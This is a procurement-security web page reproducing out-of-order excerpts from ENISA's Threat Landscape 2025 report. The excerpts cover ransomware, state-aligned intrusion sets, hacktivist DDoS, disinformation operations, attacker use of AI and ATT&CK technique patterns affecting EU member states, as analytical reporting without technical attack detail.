EU/ENISA/EDA-veileder

ENISA Threat Landscape 2025

FOA-kildevisning for sikkerhet og beredskap i offentlige anskaffelser

Denne siden viser kildetekst som brukes i FOA Pro sin sikkerhets- og beredskapsbase. Teksten er strukturert for søk, kildekontroll og praktisk anskaffelsesarbeid.

ENISA THREAT LANDSCAPE 2025 TLP:CLEAR | October 2025

attempts to disrupt operational technology systems134 These campaigns often aimed to publicly associate manufacturers with geopolitical conflicts, particularly when firms were linked to defence supply chains 135. Cybercrime is reportedly the primary threat to the manufacturing sector, both in terms of level of activity (59.3%) and reported impact. While data breaches accounted for 20.5%, the most deployed ransomware strains include Akira (48.7%), Qilin (20.5%), and FOG (10.3%). In H2 2024, multiple ransomware incidents resulted in prolonged disruptions to the business continuity of EU manufacturing organisations, including an attack by BlackBasta on the German consumer‑electronics maker Medion AG that resulted in prolonged IT and website disruptions in November 2024136 137, and the targeting of the German Arntz Optibelt Group in August 2024 that impacted their IT systems138 139. These incidents illustrate the impact of ransomware on the manufacturing sector. As both companies operate globally, including in the EU, it is highly likely these attacks also had an impact in other EU MSs.

Based on reports mentioning the targeting of the manufacturing sector by State-nexus intrusion sets in the EU, two incidents were identified, including activity imputed to UNC5221 observed in Germany, while an unidentified China-nexus intrusion set was linked to a broader campaign involving clusters such as PurpleHaze and ShadowPad. This campaign, running from July 2024 to March 2025, affected over 70 global targets, including multiple entities in manufacturing. It is plausible that part of these activities would pertain to the theft of intellectual property.

This is notably exemplified by spearphishing campaigns for cyberespionage purposes targeting EU MSs, with a particular focus on transport238 239, defence and logistics related entities as well as telecommunications infrastructures240 241 and embassies carried out by APT28. This intrusion set was also observed targeting political parties and institutions242 243. In the aftermath of its successful compromise of Microsoft systems in January 2024 244 245 , APT29 was reported to be conducting a global rogue RDP campaign using spearphishing emails to target multiple EU MSs, the European Space Agency (ESA) and NATO Enterprise246 247 248 249. Registration of the identified infrastructure reportedly started as early as August 2024, with domains notably impersonating Amazon and Microsoft services and masquerading as organisations in the government, NGO, military and IT sectors. APT29 was also seen resuming their wine tasting event spearphishing campaign, masquerading as an EU MS embassy to target EU Ministries of Foreign Affairs250 251. Finally, assessed to be particularly advanced intrusion sets, Turla and Sandworm were both reported active in the EU. While focused on conducting cyberespionage and disruptive campaigns against Ukraine, Sandworm’s apparent mandate still pertains to the energy vertical252 253, notably illustrated by its targeting of a gas storage entity in an EU MS, as well as a spearphishing campaign targeting attendees at an EU-based natural gas conference254. Turla was reported as conducting a long-standing cyberespionage campaign seemingly focused on one specific EU MS, with multiple attempts against governmental entities between January 2024 and May 2025255.

The top five China-nexus intrusion sets active in the EU include UNC5221 (reportedly overlapping with Volt Typhoon), Mustang Panda, APT41, Flax Typhoon and Salt Typhoon. The overall targeting of China-nexus intrusion sets in the EU indicates a focus on the public administration, transport, civil society and digital infrastructure sectors, as well as consistent cyberespionage campaigns against Italy, Germany, France and Belgium.

7. STATE-ALIGNED ACTIVITIES In this section, ‘nexus’ should be understood as aligned or associated to some extent to a specific country, as reported in open sources, based on public attributions from national, EU and non-EU authorities as well as high confidence imputation by trusted private vendors. State-aligned adversaries tracked by ENISA include state-nexus intrusion sets, hackers-for-hire, faketivists and private sector offensive actors (PSOAs). While also considered a part of state-aligned activities, Intrusion Manipulation Sets (IMS) involved in information operations are covered in a separate dedicated section of this report. Among state-aligned adversaries, 46 distinct intrusion sets were observed to be active in the EU over the reporting period. Approximately 14.2% of state-aligned malicious cyber activities were not imputed to a known or newly documented intrusion set, with Russia-nexus recording the highest number of unidentified intrusion sets (47%), followed by China-nexus (43%) and DPRKnexus (36%). This gap likely stems from shifts in or the emergence of observed Tactics, Techniques and Procedures (TTPs) and toolsets leveraged by Intrusion Sets, known offensive cyber doctrines of specific nexuses (i.e. usage of front companies, contractors, digital quartermasters) and the diverse tracking and reporting practices of private vendors. While this lack of association does not impact detection strategy, it is likely to hinder accurate situational awareness and preparedness efforts.

Between July 2024 and July 2025, 7.2% of incidents associated with state-aligned activities against EU MSs were identified, with Russia-nexus intrusion sets documented as the most active, followed by China-nexus and DPRK-nexus intrusion sets. Over the reporting period, outliers were identified, notably with activities carried out by India-nexus intrusion sets. While accounting for a low share, statealigned cyberespionage remains a primary concern in the medium-to-long term.

In the near-term, it is highly likely public and private organisations in EU MSs will continue to face hacktivistassociated threats with periodic peaks, stable cyberespionage activities with a continued prevalence of Russia-nexus and China-nexus intrusion sets, and an even more mature yet further fragmented cybercriminal ecosystem. In terms of impact, the EU threat picture will remain dominated by opportunistic cybercriminal activities involving the use of ransomware and information-stealers, despite the achievements of law-enforcement. Displaced or disrupted RaaS brands will continue being promptly replaced by emerging programmes. The criminal marketplace will continue formalising around skills to further scale campaigns, notably through AI integration, IoT and large-scale exploitations of vulnerabilities and the targeting of critical sectors, notably hosting companies and IT providers. The rising use of EDR-kill tooling (e.g., AvNeutralizer, EDRKillShifter) and BYOVD, as well as legal-pressure features in extortion playbooks, will sharpen both the speed and leverage of intrusions.

Hacktivist-led DDoS will persist as a nuisance, both in terms of the disruption of business continuity and in the information operation sphere, highly likely with spikes around high visibility events and announcements by EU MSs and EU entities and authorities. State-nexus intrusion sets will continue to blend espionage, supply-chain access and IO, increasingly leaning on compromised EU-hosted infrastructure. Looking forward, cyber threat activity is likely to further intensify along three dimensions: convergence, automation and industrialisation. AI will accelerate cycles of offensive innovation, enabling rapid campaign development and more effective deception techniques. Abuse of cyber dependencies will remain a strategic priority, while the persistence of hacktivism and disinformation campaigns will continue to influence public perception and policy debates. The highlights of this report underscore how defensive strategies must become intelligence-driven and systemic, emphasising proactive threat hunting, behavioural detection and the integration of cyber risk management into broader operational and policy frameworks.

Organisations should prioritise comprehensive asset discovery, automated vulnerability management and resilience planning for interconnected systems and services. Collaboration between Member States, EU institutions and private industry is essential for countering the threats. In parallel, the European policy landscape is evolving to address these challenges. The Cyber Resilience Act (CRA) introduces mandatory security requirements for digital products and services, aimed at reducing systemic vulnerabilities by embedding security-by-design practices and formalising vulnerability disclosure obligations. The Cyber Solidarity Act (CSoA) strengthens Europe’s collective defence by improving mechanisms for cross-border incident response and the coordinated sharing of threat intelligence. The updated Cybersecurity Blueprint further supports these efforts by creating structured escalation paths and standardised response procedures for large-scale incidents.

Together, these frameworks provide the foundation for a more unified and proactive cybersecurity posture across the EU. In close cooperation with Union entities, ENISA is central to translating these policy measures into tangible outcomes. Its work on situational awareness, operational cooperation, support for critical sectors, certification schemes, capacity building and policy monitoring ensures that regulatory initiatives are supported by strategic and operational expertise. Through coordination of the CSIRT Network, support to CyCLONe, and the development of taxonomies and reporting frameworks, ENISA helps to harmonise reporting obligations and improve the visibility of systemic risks. Annual threat assessments, red-teaming exercises and sector-specific guidance further reinforce the EU’s readiness, enabling organisations and Member States to operationalise regulatory requirements.

Almost all EU MSs were reportedly targeted by State-aligned offensive cyber activities. While no information related to the targeting of Luxembourg was identified in open sources, it is plausible the targeting of this MS would be conflated in the ‘unidentified EU MS’ category. Accounting for 38% of the total number of reported targeting, this category notably includes vague phrasing documented in open-source reports such as ‘Western Europe’, ‘Southern Europe’, or ‘EU country’.

From a sectorial vantage point, the top five targeted NIS2 sectors in the EU by State-aligned threat groups based on open-source reports include public administration, transport, digital infrastructure, energy and health. As mentioned before, this ranking comes with multiple caveats, based on unspecified or non-granular reporting – notably exemplified by the ‘unknown’ and ‘private companies’ categories accounting for 33% of all recorded targeting as well as differences in sectorial worldwide reporting conventions. However, as will be detailed in the following sections and based on historical reporting, this graph is assessed to be a realistic snapshot of sectorial targeting by State-aligned intrusion sets.

7.1 KEY STATE-ALIGNED THREATS 7.1.1 Russia-nexus intrusion sets Reportedly the most active over the reporting period, Russia-nexus intrusion sets continuously targeted EU MSs in cyberespionage campaigns. The most documented intrusion sets include APT29, followed by APT28, and Sandworm. Overall, Russia-nexus offensive cyber activities targeted the public administration with a clear focus on governmental and diplomatic entities, the defence sector and the digital infrastructure sector. While targeting multiple EU MSs, geographical targeting in the EU indicates a focus on Poland, France, Germany, Belgium and Greece. Both sectorial and geographical targeting are likely to be partly related to EU MSs’ support for Ukraine, in the context of Russia’s war of aggression against Ukraine since February 2022.

increase legitimacy of false narratives. The intensity of attacks against public institutions tended to increase around and during election periods or important political events. Doppelgänger, a major and long-running IMS, recently imputed to Struktura and Social Design Agency, and reportedly directly funded by the Russian state349 was seen to be particularly targeting French, German and Polish national audiences and public institutions, as well as the Union, most notably through inauthentic articles conveying anti-EU sentiments, especially in the context of Russia’s war of aggression against Ukraine. With an initial focus on impersonating Western news outlets and government websites, Doppelgänger has evolved into a multi-layered operation, reportedly deploying large networks of fake domains impersonating legitimate outlets designed to manipulate platform algorithms, running sponsored ads on Meta 350 to drive traffic to its deceptive sites and relying on large-scale Coordinated Inauthentic Behaviour (CIB) networks to ensure widespread distribution.

Over time, the campaign has shown resilience, by refining its techniques and adapting to takedowns by hosting providers and social media platforms by re-registering websites under different Top-Level Domains (TLDs), migrating to different hosting providers and using disposable social media accounts to amplify content351. In December 2024, Doppelgänger-associated entities and individuals were sanctioned by the EU352, the UK353 and the US354. Notably known for its videos impersonating EU institutions such as the Parliament and the Commission, EU MSs public institutions within the security sector355 and public media outlets, Matryoshka356 357 was reported to be using AI-assisted voice cloning to increase perceived legitimacy of the impersonation videos 358, with June 2025 marking the first iteration cloning of the voice an EU official359. The videos are amplified on X and Bluesky through two sets of coordinated inauthentic accounts (CIBs), the first set known as ‘seeder’ accounts posting the videos, further shared through a larger set of accounts known as ‘amplifiers’.

While targeting similar audiences as Doppelgänger, Matryoshka impersonates French and German public institutions with narratives addressing broader audiences with misleading narratives360 361 362. The IMS strategically exploits narratives during major events such as election campaign seasons in countries such as Poland and Moldova. Matryoshka has reportedly funnelled substantial operational resources towards Moldova363. Storm-1516364 365 operates a growing network of at least 230 inauthentic websites to publish inauthentic articles in the English, French and German languages and display visual features mimicking Western media outlets. These inauthentic websites, as well as X accounts, are used to strategically launder information, with some of them identified for their repeated involvement in FIMI operations including publication of fake investigations, social media posts and videos. Over the reporting period, Storm-1516 notably focused its actions on the German legislative elections, publishing multiple narratives questioning the integrity of the elections366.

Investigations show the involvement of individuals and organisations close to the Russian government behind the operations carried out by Storm-1516367. Known for its overlap in amplification patterns with Storm-1516, The Russian Foundation to Battle Injustice often publishes content mostly in English, German and French, such as inauthentic articles, which is then laundered and amplified across various

A cluster appears around the discovery techniques (e.g., T1057 Process discovery, T1016 System network configuration discovery, T1082 System information discovery, T1083 File and directory discovery, T1135 Network share discovery), indicating they are frequently enumerated together under the discovery tactic, which is typical when adversaries inventory systems and networks. A second cluster centres on execution techniques — notably the command and scripting interpreter family (T1059 and sub-techniques T1059.001/.003/.005) and related execution vectors (T1047 WMI, T1106 Native API, T1569.002 Service Execution, T1204.* User Execution). Persistence shows its own block (T1543.003 Windows Service, T1112 Modify Registry, T1547.* logon/registry autostart, T1136 Create Account, T1078.* Valid/Domain/Local Accounts), Persistence techniques like Windows Services (T1543.003), registry changes (T1112, T1547.) and account creation or abuse (T1136, T1078.) often appear together, showing how adversaries are able to layer multiple foothold methods. Smaller but coherent blocks appear for Exfiltration (T1041, T1048., T1052.001, T1567.) and Impact (T1485/86/89/90/91.001/1529). A more detailed version of TTPs is available in the Appendix.

When documenting tactics, techniques and procedures (TTPs), it is important to recognise that vulnerabilities are part of the picture. Exploitation of vulnerabilities remains a prevalent intrusion vector (21.3%). Vulnerabilities are commonly assigned identifiers and, when included in TTP documentation and thoroughly documented, these connect adversary behaviour to the precise weaknesses they exploit. Tracking vulnerabilities with the surrounding TTP context supports effective prioritisation. By embedding vulnerabilities within the broader structure of TTPs, defenders gain both the technical detail needed for patching and the operational context needed to assess risk and allocate resources effectively. In line with Coordinated Vulnerability Disclosure practices in the EU483 and complementary to its role as a CVE Numbering Authority (CNA) 484, ENISA maintains the European Vulnerability Database (EUVD) 485 to further support the cybersecurity community by providing reliable and timely information related to vulnerabilities.

Overall, 42 595 new vulnerabilities were disclosed over the reporting period — a 27% increase from the previous year. A break-down of the vulnerabilities in the Common Vulnerability Scoring System (CVSS) shows that 7% were Critical, 26% High, 43% Medium and 3% Low, while 21% remained unscored, likely reflecting delays or gaps in CVSS assignments.

While incidents impacting the health sector accounted for only 4.2% of the overall cybercrime incidents identified, ransomware attacks against two German organisations that resulted in the postponement of medical procedures remain of particular concern182 183.

6.3 CYBERCRIME GEOGRAPHICAL IMPACT Ransomware incidents continued affecting EU Member States, with a notable shift in geographical impact compared to ETL 2024. The top five EU MSs referenced in ransomware and data breaches claims include Germany (23.4%), Italy (11.33%), Spain (9.8%), France (9.5%), and Belgium (3.7%). While this ranking could stem from multiple factors, and as analysed by the CCB, it is likely these EU MSs would be seen as major economic players within the EU and thus represent high value targets 184. During the report period, manufacturing remained the most consistently targeted sector across all five EU MSs. Germany recorded the highest number of claims by SafePay, INC Ransom and Akira, with the most targeted sectors being manufacturing and digital services providers. Italy saw increased activity from Akira, Sarcoma, and Qilin, targeting the manufacturing sector, followed by digital infrastructure and services. Spain saw Qilin in first place, followed by Akira and FOG, with manufacturing being targeted the most, followed by business services and public administration. France was mostly impacted by Qilin, Hunters International, and CL0P, Belgium saw activity from RansomHouse and Play, alongside SafePay and Qilin. In both Belgium and France, manufacturing was the most targeted sector, followed by DIS.

foreign policy briefings disguised as legitimate EU institutional documents329, UNC3313 and UNC5667 impersonating the Hungarian government330, Charming Kitten posing as EU-based journalists and think-tank researchers331 and Kimsuky leveraging EU-branded diplomatic meeting invitations containing malicious macros332. As previously mentioned, multiple state-nexus intrusion sets leveraged or compromised EU-based infrastructure to host C2 servers or support follow-up cyberattacks. Such tactics help obfuscate the true origin of traffic, exploit the trust associated with EU network assets and risk implicating EU countries in malicious activity purely on the basis of IP address attribution. China-linked intrusion sets made especially extensive use of EU infrastructure through Operational Relay Box (ORB) networks, incorporating devices, servers and hosting services in the EU333. In other cases, EU-hosted servers were used to deliver secondstage payloads, such as the Remcos backdoor, in campaigns targeting Ukraine334.

Since 2023, Turla configured its KAZUAR backdoor to communicate via compromised WordPress installations hosted within the EU, further embedding malicious infrastructure in trusted environments335. From Q3 2024 to Q2 2025, multiple state-nexus intrusion sets targeted EU entities outside EU territory— focusing on diplomatic missions, development programmes, commercial operations and cultural institutions. These operations often aligned with the geopolitical priorities of associated nexuses, prioritising intelligence collection on foreign policy, trade negotiations and multilateral security cooperation. This is exemplified by campaigns carried out by Russia-nexus intrusion sets APT29 targeting EU diplomatic missions abroad336. This is of particular concern, as overseas missions and affiliated organisations maintain regular contact with Brussels and EU Member State capitals, so compromises could facilitate lateral movement into core EU networks.

This operational reality underscores the advantage adversaries gain by focusing on outposts in third countries, where strategic data can be collected in potentially more permissive environments. State-nexus intrusion sets also targeted non-EU diplomatic missions, international organisations and commercial entities operating within EU territory, as exemplified by Callisto targeting Russian exiles in the EU, Charming Kitten leveraging journalist personas to approach Middle Eastern embassy staff stationed in European capitals337, Earth Preta targeting Asian diplomatic missions in EU capitals338, and TAG-100 conducting reconnaissance activities against the Cuban embassy in France339. In August 2024, as part of Operation AkaiRyū, MirrorFace was reportedly seen for the first time in the EU. Based on MirrorFace’s historical focus on Japan, it is highly likely that targeting the EU served as a vector to target Japanese entities340.

3. THREAT LANDSCAPE OVERVIEW Based on the analysis of the dataset, social engineering tactics remain the primary entry point for threat actors, with phishing (including vishing, malspam, and malvertising) accounting for about 60% of observed cases. Exploitation of vulnerabilities (21.3%) remains a prevalent intrusion vector, followed by botnets (9.9%). Malicious applications represent 8%, showing that compromised or trojanised software and applications continue to play a role in system intrusions, while unauthorised access by insider threats (0.8%) contribute smaller but still relevant shares. Overall, the distribution underscores that while phishing dominates the threat landscape, technical exploits, malware delivery mechanisms and insider risks remain meaningful concerns.

The data shows clear contrasts between phishing and vulnerability exploitation as intrusion vectors. While phishing is the most common pathway, its impact is diverse. Approximately 73% of phishing cases are classified as unknown, reflecting unclear or varied follow-up of malicious activities, and 27% led to intrusions. In terms of payloads, phishing leads to the deployment of malicious code in 23% of cases, suggesting it might be primarily used for malwareless objectives. Vulnerabilities, on the other hand, show a more focused risk profile. Nearly 70% of vulnerability cases culminate in intrusions, with 30% categorised as unknown, and 68% of these vulnerability-based incidents result in the deployment of malicious code, indicating that the exploitation of vulnerabilities is often a direct precursor to the installation of malware.

The distribution of incident types is dominated by DDoS attacks, which make up about 76.7% of recorded cases. This category is overwhelmingly driven by hacktivist groups, which account for the majority of collected DDoS incidents, with cybercrime groups contributing a marginal fraction, often tied to extortion (e.g., ransom DDoS). Intrusions follow with 17.8%, dominated by cybercriminal activities, followed by statealigned intrusion sets, which typically pursue persistence. Hacktivists appear only marginally in intrusion cases. Defacements were almost exclusively associated with hacktivists, underlining their role as a symbolic tactic for visibility and protest rather than a sustained intrusion method.

Accounting for approximately 70% of the claims against Lithuania, NoName057(16) was followed by Dark Storm Team, Mr Hamza, OverFlame, and Z-PENTEST-ALLIANCE. While NoName057(16), Dark Storm Team and Mr Hamza demonstrated a focus on targeting the public administration and transport sectors, NoName057(16) was also observed targeting the finance vertical. A more granular analysis of our dataset shows some level of focus against specific EU MSs, with clear outliers being the activities of Keymous+ in Estonia and France, and Dark Storm Team activities against Poland and Finland. While it is not possible to establish a clear connection, it is plausible some hacktivist groups might have specific geographic assignments to support and/or complement activities against specific EU MSs. As previously mentioned, peaks of hacktivist activity are typically observed following announcements related to Ukraine422 423 424, as notably exemplified by the launch of the #OPBelgium campaign following Belgium’s announcement of €1B in military aid425 426 427. A few outliers further illustrating this observation were identified in ENISA’s dataset. Between the end of April and May 2025, Anonymous VNLBN claimed at least 27 attacks against France, following announcements of support for Ukraine and the freezing of Russian assets 428 429. Fredens of Security’s targeting of Italy, Germany, Denmark and Poland between 12 and 15 December 2024 followed declarations of assistance and equipment deliveries to Ukraine 430 431 432. The targeting of Belgium by INDOHAXSEC TEAM from 10 December to 12 December 2024 may be viewed in the context of the European Council’s approval of the second payment under the EU’s Ukraine Facility 433. It may be noted that these groups were only active for these very short-lived, highly focused operations. Finally, EU MSs electoral processes over the reporting period were particularly targeted by hacktivist-led DDoS claims434 435 436.

9.3 HACKTIVISM SECTORIAL TARGETING Across the EU, targeting patterns reveal both common sectorial focuses and country-specific nuances, with public administration, finance, transport and digital infrastructure remaining the prime targets across all EU MSs. The targeting of manufacturing and energy sectors is prevalent in Poland, Czechia and Romania, all three being heavily involved in supply-chain support for Ukraine. Over the reporting period, the most impacted sectors by hacktivist activities in the EU included public administration (63.1%), transport (12%), finance (11.7%), digital infrastructure (5.4%), and manufacturing and media/entertainment (4% each).

6.4 KEY CYBERCRIME TRENDS 6.4.1 Tactics, Techniques and Procedures (TTPs) Over the reporting period, cybercriminal groups were seen updating their TTPs, notably through the development or maintenance of their toolsets, as well as their pressure tactics. Reuse of leaked builders continued to be observed, as illustrated by the SafePay ransomware, suspected of being derived from a modified LockBit3 builder 185. It is likely that publication of the VanHelsing RaaS source code in May 2025 will be leveraged by other ransomware operators and contribute to the lowering of barriers of entry to the cybercriminal market for newcomers 186. While infostealers continued to be delivered through cracked software, phishing pages and public code repositories, new delivery mechanisms were observed, such as fake CAPTCHA verification pages, cloudbased file hosting services and embedded links in video platforms as well as other high-traffic low-cost delivery vectors187 188. During this reporting period, cybercrime groups started using tools designed to disable Endpoint Detection and Response (EDR) solutions, enabling them to conduct stealthier intrusions focused on rapid data exfiltration. In July 2024, FIN7 was observed advertising AvNeutralizer (aka AuKill), a specialised tool for tampering with endpoint defences, to multiple ransomware groups 189. The tool had been previously linked to intrusions deploying AvosLocker, MedusaLocker, BlackCat/ALPHV, Trigona and LockBit 190, all of which were reportedly active in the EU. In August 2024, RansomHub started using similar tools, as can be seen by their adoption of EDRKillShifter and TDSSKiller —leveraging them to disable EDR protections191 192. In June 2025, variants of EDRKillShifter started to be incorporated in multiple RaaS toolsets, including LockBit, Medusa, and BlackCat/ALPHV193 194 195. Another technique illustrating this trend is the use of a HeartCrypt-packed loader with the malicious driver ABYSSWORKER in a Medusa ransomware chain, revealing how attackers exploit or bring their own signed drivers to disable EDR systems 196. Of particular concern in this regard is the reported abuse of a legitimate tool called HRSworld 197, likely to be increasingly observed in cybercriminal activities. Fog and Qilin, both relatively recent ransomware strains, relied on aggressive pressure tactics, including countdown timers, victim profiles and downloadable sample files in double extorsion, targeting reputational damage or regulatory exposure 198, or in the case of Qilin a new ‘call lawyer’ feature, which mimics legal escalation, pressuring victims to act quickly under the illusion of formal consequences 199. The legal pressure developments are of particular relevance in the EU, where cyber incident reporting and GDPR obligations are likely to represent an additional incentive for impacted companies to pay the requested ransom. Additional TTPs of interest over the reporting period include resorting to physical components 200. Observed since at least the mid-2010s in China and globally since 2019 201, pig-butchering scams 202 are increasingly reported as being leveraged to target citizens in EU MSs. In 2024, pig-butchering scams grew by

Scams in which threat actors spend weeks or months building trust with victims, often through fake online relationships, before defrauding them of their money, often by convincing them to invest in fraudulent cryptocurrency platforms.

5.4 FINANCE The finance sector accounted for 4.7 % of all collected incidents, with hacktivist-led DDoS attacks clearly dominating the threat picture, making up 83.5% of the incidents, followed by cybercrime (14.8%) and statealigned (1.7%). Of note 11% of the incidents with a significant impact reported under the network and information security (NIS) directive in 2024 were incidents in the finance sector131. Within the finance sector, incidents are primarily concentrated in the banking subsector, which accounts for 21.6% of cases. The insurance subsector follows at around 3.4%, while blockchain-related services represent an exceedingly small share at less than 1%.

Banks are also the most targeted subsector by hacktivist groups (69%), likely in an attempt to create nuisances for the users of online banking services, ultimately contributing to the information operation component of hacktivism. NoName057(16) (71.1%), Keymous+ (13.7%) and DarkStorm Team (15.2%) were recorded as being the most active against the finance sector overall. Peaks of activity were notably observed around electoral processes in EU MSs 132, as well as during tense political and societal contexts at the national level in EU MSs, especially when related to polarising topics.

As they clearly process a significant amount of financial and personal data, financial institutions represent high value targets for cybercriminals. Data breaches pertaining to the finance sector amounted to 64% while ransomware accounted for 36%. The ransomware strains reportedly deployed against EU financial institutions were Akira (20%), Datacarry (12%) and BlackLock (4%).

Typically associated with DPRK-nexus intrusion sets, targeting of the finance sector over the reporting period by China-nexus intrusion sets was also observed, with an overall total of two incidents. While the widelyspread nature and lack of granularity of events associated to Lazarus does not allow for a more detailed analysis pertaining to EU organisations 133 and based on Lazarus’ previously reported activities, it is highly likely this intrusion set still represents a primary threat to EU financial organisations.

5.5 MANUFACTURING Despite a rather low share overall (2.9%), the manufacturing sector went from seventh to fourth place among NIS2 sectors compared to ETL 2024. While a majority of impacted manufacturing organisations were unidentified (94%), the breakdown of identified subsectors shows a clear focus on defence and automotive related entities. As websites of these two subsectors were particularly targeted by hacktivist-led DDoS attacks (45.8% of manufacturing targeting by hacktivist groups), it is highly likely this justifies the EU MS ranking, where these EU MSs are perceived as particularly mature in both their defence and automotive sectors.

Similarly to the targeting of previously documented sectors, hacktivist activities against this sector (39.3%) were primarily grounded in the context of the support of Ukraine by EU MSs and led by NoName057(16) (75.6%). Hacktivist activity targeting the manufacturing sector included DDoS attacks and, in some cases,

NoName057(16) claims particularly pertained to the targeting of Italy, France and Poland, alongside Lithuania and Germany. This illustrates a particular emphasis on EU MSs possibly being perceived as threats to Russia in that country’s ongoing war of aggression against Ukraine. NoName057(16) reportedly focused on entities operating in the public administration with sustained targeting of ministries, parliamentary websites and local municipalities as well as finance, with a focus on banks and payment service providers, and transport, notably air and rail transport websites, with the occasional targeting of telecoms and hosting services. NoName057(16)’s activities were highly driven by geopolitical events, including declarations of support for Ukraine by EU MSs and Union entities, as well as sociopolitical situations at the EU level. These are illustrated by their DDoS attacks against the websites of Europol and the European Parliament in response to EU foreign policy actions in September 2024396, and the targeting of Belgian electoral infrastructure for seven consecutive days, in retaliation for that EU MS’s commitment to supply military equipment to Ukraine 397 398. Assessed to be a ‘for-hire’ opportunistic group originating from North Africa399, Keymous+ demonstrated a focus on France and Estonia, with activities in Belgium, Denmark and Germany. Most claims were related to public administration, mostly municipal and regional government portals, followed by finance, notably insurance firms and regional banks, digital infrastructure, including domain registrars and cloud providers, education, and media/entertainment. The pro-Palestine anti-Israel Dark Storm Team primarily targeted Poland and Finland, followed by France, Lithuania and Germany. The group’s campaigns were particularly prevalent against the EU public administration sector, followed by transport, finance and media/entertainment and manufacturing. The Dark Storm Team focused heavily on Ministries of defence and Ministries of foreign affairs, aviation and airport services, and news outlets. The pro-Palestine anti-Israel Mr Hamza claimed attacks against France, Spain, Germany, Lithuania and Belgium, with attacks focused on public administration, with a notable targeting of the manufacturing sector. The group was seen to increase its activities after Q4 2024, through their participation in the Holy League alliance, which reportedly gathered pro-Russia and proPalestine groups400 401 402 403 404 405. Between February and March 2025, Mr Hamza was particularly involved in coordinated campaigns, including #op_france406, #op_italia, #opromania, #opbelgium, and #opnato407 408 409. The pro-Russia Rippersec, while relatively less active, demonstrated a slow but steady increase in activity against EU MSs throughout the reporting period. This group appeared to specifically target the public administration and media/entertainment sectors, followed by transport, with a claimed intent to target operational technology (OT).

THE OVERALL IMPACT OF DDOS ACTIVITIES REMAINED MARGINAL. For each most active hacktivist group, analysis shows that explicitly confirmed disruptions are quite limited, with Keymous+ and Mr Hamza appearing slightly more disruptive with approximately 1.5% of attacks resulting in websites slowdowns and/or disruptions. Interestingly, while the most prolific in terms of volume, NoName057(16) activities led to almost no confirmed outages, further corroborating the hypothesis of an information operation aspect to activities carried out by this group.

In the context of the Romanian elections, FIMI activities targeting EU entities focused on accusing them of attempting to manipulate the electoral outcome. Russian state-controlled media outlets and official government channels played a key role in shaping and disseminating the core narratives 385, which were later adapted and amplified through IMS, notably Doppelgänger and Portal Kombat. For instance, the Russian Foreign Intelligence Services published a press release accusing the President of the European Commission of pressuring Romanian authorities to arrest a far-right politician386, which was reshared by Russian and Belarusian state-controlled media as well as the Portal Kombat infrastructure387 388. During the Moldovan Presidential elections and as the vote also included a referendum on EU accession, EU entities were particularly targeted. Russian FIMI activities leveraged themes of interference, portraying the EU as hegemonic and tyrannical.

It particularly exploited topics linked to LGBTIQ+ rights to further these narratives. Various behavioural patterns were leveraged in these incidents, including videos impersonating the President of the European Commission and its Vice-President, and manipulated quotes of the EU Ambassador to Moldova389 390 391 392 393. Besides elections, a wide array of events was exploited to further their narratives and degrade Union entities and public institutions in EU MSs as illustrated by a video demanding the replacement of the EU ambassador to Niger, accused of misuse of funds and destabilisation following an EU announcement of €4.5 million in aid to the flood ridden Sahel and Lake Chad regions394. Similarly, Matryoshka leveraged the April 2025 European power outage blaming it on EU sanctions on Russia and accusing the President of the European Commission of blaming it on Russia395.

ransom letters mailed to executives by criminals masquerading as the BianLian ransomware group 51, or the preposterous re-emergence of Babuk ransomware52 53. State-nexus intrusion sets also leveraged or brokered cybercrime tradecraft54, as illustrated by DPRKnexus Kimsuky using the Clickfix technique, Andariel linked to the Play ransomware activity, likely as an affiliate or IAB, and Moonstone Sleet reported leveraging the Qilin ransomware55 . Similar cross-over was identified with China-nexus intrusion sets, with NailoLocker operations in June and October 2024 targeting the EU health sector, and Mustang Panda leveraging the RA ransomware, plausibly in the frame of moonlighting activities56 57. State-nexus intrusion sets were increasingly reported leveraging cybercriminal infrastructure. APT29 and Sandworm were observed using commercial residential proxy networks and sharing hosting with cybercriminals—while Andariel58 and Sandworm59 were seen deploying commodity infostealers. Conversely, cybercriminal groups adopted social engineering techniques seen used by state-nexus groups, as observed with FIN6 leveraging job applications and fabricated LinkedIn personas to deliver malware, echoing DPRK’s playbook60. Finally, hybrid campaigns should also be mentioned in this section, especially with activities aligned with Russian objectives continuing to impact EU MSs beyond cyberspace61 62. In November 2024, Romania’s Constitutional Court annulled the presidential first-round results after its intelligence agencies presented declassified findings that Russian-linked cyber operations—including coordinated social media campaigns with AI-driven misinformation and alleged cyberattacks—distorted the electoral process in favour of the farright candidate63. In March 2025, investigative reporting detailed pro-Russia groups using Telegram to recruit EU-based individuals for sabotage, vandalism, arson and influence operations across NATO countries 64 65 66 67 68 69 70.

4.5 PREDICTABLE USE OF AI Over the reporting period, the continuous use of AI across multiple intrusion sets continued to be observed, both as tools to facilitate or enhance offensive activities and as targets for exploitation. The largescale deployment and availability of AI systems objectively generate a new level of scalability in malicious activity on the side of attackers71. While AI-enabled threat activity previously involved attempts by threat actors to use consumer-grade AI tools to augment existing operations, rather than achieve breakthrough capabilities, the emergence of stand-alone malicious AI systems since the beginning of 2025 is of particular concern. As a predictable trend, Large Language Models (LLMs) are leveraged to craft more convincing phishing emails; with reportedly over 80% of all phishing emails identified between September 2024 and February 2025 using AI to some extent72. AI is notably used in vishing and online fraud involving impersonation, with the

almost 40% year-on-year, reportedly generating between €9.1 (USD 10.6) billion and €11.4 (USD 13.3) billion, and accounting for over one-third of global cryptocurrency scam revenue 203. Throughout this period, open sources noted the increased use of generative AI and deepfake videos to impersonate trusted contacts, enhancing the social-engineering phase of these scams. In late 2024, over two million accounts linked to pigbutchering activity were taken down, much of it originating from criminal centres in Southeast Asia and, increasingly, in Eastern Europe and Africa 204 205. Between 10 and 17 September 2024, Europol coordinated an international operation dismantling a mobile-phone phishing network that unlocked over 1.2 million stolen devices; elements of the compromised devices and stolen credentials had been repurposed for pig-butchering outreach and cryptocurrency theft206. Of rising and significant concern is the physical targeting, including kidnapping, of crypto-asset holders and their families207 208. These events have been linked to data leaks from centralised crypto exchanges, which often contain PII, including, in some cases, home addresses209. Such physical attacks were publicly reported in multiple EU MSs, with several high-profile cases notably in Belgium210, France211 and Spain212.

